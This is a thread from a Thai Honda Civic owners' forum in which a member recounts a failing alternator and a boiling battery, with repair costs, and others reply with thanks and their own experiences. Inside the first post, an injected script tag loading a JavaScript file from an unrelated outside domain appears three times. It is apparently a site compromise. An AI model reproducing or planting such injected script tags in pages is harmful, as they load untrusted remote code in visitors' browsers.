ตอบ
Khachi


เข้าร่วม: 28 พฤษภาคม 2012
ตอบ: 538

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 1342
ให้คำขอบคุณ: 4
ศุกร์, 16 สิงหา 2013 08:46 - แบ่งปันเรื่องไดร์ชาร์จครับ
รูปแบตโชวร์เป็นพักๆ เป็นเฉพาะเวลาขับช้าๆ จอกับที่ไม่แดง  
เช็คแบต ก็แรงดีครับ เก็บไฟปรกติ  เวลาวัดที่ขั้วก็ได้ 13-14 ลองเร่งเครื่องดู มันก็ชาร์ทคงที่ ไม่ Over 
ทนขับมาอาทิตย์นึงครับ ได้กลิ่นแบต  ไปดู เอ้าเดือดซะงั้น อายุแบบ เลย 12 เดือนแค่ 4 วัน

สงสัยมันเป็นที่แบตหรือ ไดร์ ลองสตาร์ดรถสังเกตุเกร์น้ำมันว่ามัมนตกอะเปล่า  ไม่ตกแฮะ แสดงว่าไฟแรงอยู่
สตาร์ดรถเสร็จ ไปเปิดฝากระโปรง เอากุญแจเบอร์ 10 ถอดขั้วลบออก..... ดับ เอ้าวววว.. ไปแล้วไดร์ผม (ปรกติมันจะไม่ดับ)
แสดงว่ามันจ่ายไฟไม่พอ เลยเสียบแบต แล้วสตาร์ดเข้าร้านไดร์เลย

ร้านจับเปลี่ยนถ่าน ขัดแกน ใส่เข้าไปอย่างเดิม วัดก็ปรกติ  โดนไป 600 


ขับกลับบ้านยิ้มด้วยความสบายไป เปิดไฟเต็มที่  ขึ้นทางด่วน พระราม 3 มาเมืองทอง ไกล้จะลงละ 
เอ้ยยย.... เข็มไมค์ผีเข้า  ตกวูป ทั้งรอบ Air back แย่งกันโชวร์  

รู้เลย รถไฟหมด  ปิดไฟหน้า ปิดแอร์ เปิดไฟกระพริบ วิ่งลงมาจาทางด่วน ถึงปากทางเมืองทอง ดับพอดี 
เอามิเตอร์มาวัดไฟ เหลือ 10 V     ลาโลกละไดร์ โทรไปหาร้านได บอกว่าวันจัทร์เอาเข้ามาใหม่ (ผมทำวันเสาร์ที่ 1o กะวันจัทร์ 12 จะกลับบ้าน ทำไงดีวะนี่....

สรุปกลับบ้านโดยการ ไปเอารถที่บ้านครับ ย้ายแบตสลับกัน แล้วสตาร์ดขับรถกลับบ้าน

วันรุ่งขึ้น ตัดสินใจรื้อไดเองครับ ถอดมันออกมาเลย (ไม่เคยรื้อหรอก แต่มันเจ็บใจ) สังเกตุจากช่างเอาน่ะวิธีการถอด
ว่าจะเอาไดไปซ่อมตามร้านถั่วๆ ไป ไปร้านไหนก็ไม่ซ่อมครับ หายากจัง ของผมไดร์แท้ครับ
ตัดสินใจไปเชียงกงว่าจะหามือสองมาแก้ขัด แต่อ่านข้อมูลตามเว็บก็ว่า ของรุ่นรถเราซ่อมใหญ่ไม่คุ้ม และห่มือสองมาก็อาจอยู่ได้ไม่นานและซ่อมก็หาอไหล่ยาก ยกเว้นถ่าน เช่นพวกสพานไฟ อื่นๆ  

เลยตัดสินใจแวะน้านไดแถวๆ นวมินทร์ ถามราคา ตัดใจเอา ไดร์ใหม่ครับ แต่ไม่ใช่ของแท้ หมายถึงของเทียบ ช่างบอกว่ามันคือตัวเดียวกันกับที่ใส่ใน vigo  รับประกัน 2 เดือน   และหาอะไหล่งานกว่าของแท้  เลยตัดใจซื้อได้มาราคา 3000 บาท เอามาเปลี่ยนเอง

กลับบ้านมาใส่เรียบร้อย โล่งอก ไฟไม่โชวร์แล้ว<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></

ขับรถขึ้นเหมือน เอ้ยแบตเดือด ลงสัยจะแจ้งแล้วแบตผม เปลี่ยนครับ
ได้ GS 45 am แบตกึ่งแห้ง แบบเดิมผมเป็นแบบน้ำ  โดนค่าแบตต 1800 เทินได้ 200 สรุป 1600 บาท
ตอนนี้ไม่เดือดละ

ถามว่าแบตเดิมใช้ได้ไหม ได้ครับ แต่มันเดือด เห็นมาก และต้องคอยเติมน้ำกลั่นแบบว่า ขับ 800 โลนี่ แห้งเลย
แบตร้อนมาก กลัวระเบิด ไม่คุ้ม เปลี่ยนซะ   


ร่วมแบ่งปันความระทึกครับ  อิอิเผื่อเป็นข้อมูลเพื่อนๆ ครับ
 
ได้รับคำขอบคุณจาก: prgs55  chan-o  HankMan  phichetza  mong_civic  narin 
miaw-es


เข้าร่วม: 24 ธันวา 2010
ตอบ: 561

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 232
ให้คำขอบคุณ: 60

ที่อยู่: รังสิต คลอง1
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 16 สิงหา 2013 09:14 - แบ่งปันเรื่องไดร์ชาร์จครับ
สรุปไดร์ชาร์ต เสียอย่างเดียวใช่รึเปล่าคับ
civicIT


เข้าร่วม: 10 พฤษภาคม 2010
ตอบ: 402

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 538
ให้คำขอบคุณ: 810

ที่อยู่: มหาชัย - อ่อนนุช
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 16 สิงหา 2013 09:23 - แบ่งปันเรื่องไดร์ชาร์จครับ
เป็นที่ไดชาร์ตใช่ไหมฮะแบบนี้
chan-o


ชื่อเล่น: โอ๋

เข้าร่วม: 26 เมษา 2013
ตอบ: 950

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 879
ให้คำขอบคุณ: 3132

ที่อยู่: ดอนเมือง & ลาดพร้าว & มหาชัย
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 16 สิงหา 2013 10:46 - แบ่งปันเรื่องไดร์ชาร์จครับ
ขอบคุณที่แบ่งปันครับ
TINNER


ชื่อเล่น: ทิน

เข้าร่วม: 23 เมษา 2011
ตอบ: 687

Guru ES
Guru ES

ได้รับคำขอบคุณ: 461
ให้คำขอบคุณ: 43

ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
เสาร์, 17 สิงหา 2013 10:13 - แบ่งปันเรื่องไดร์ชาร์จครับ
เอาไว้เป็นข้อมูลครับของผมไดพังเมื่อวันที่12ที่ผ่านมารถผมปี2001ไฟตกขณะขับอยู่จาก13vกว่าเหลือแค่10vดูจากเกจไปเช็คดูไดพังครับหาอะไหล่ไม่ได้เลยเทียบเอาของแจ๊สมาใส่ยกทั้งลูกเชียงกงครับแปลงขาตั้งสายพานใหม่แล้วแปลงแบบคัตเอ้าท์นอกตอนนี้ใช้งานปรกติครับถ้าไม่มีเกจบอกผมคงได้เข็นแน่ๆปล.ถ้าสงสัยว่ามีปัญหาที่ไดลองติดเครื่องแล้วถอดขั้วแบตครับถ้าเครื่องดับพังแน่นอน
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.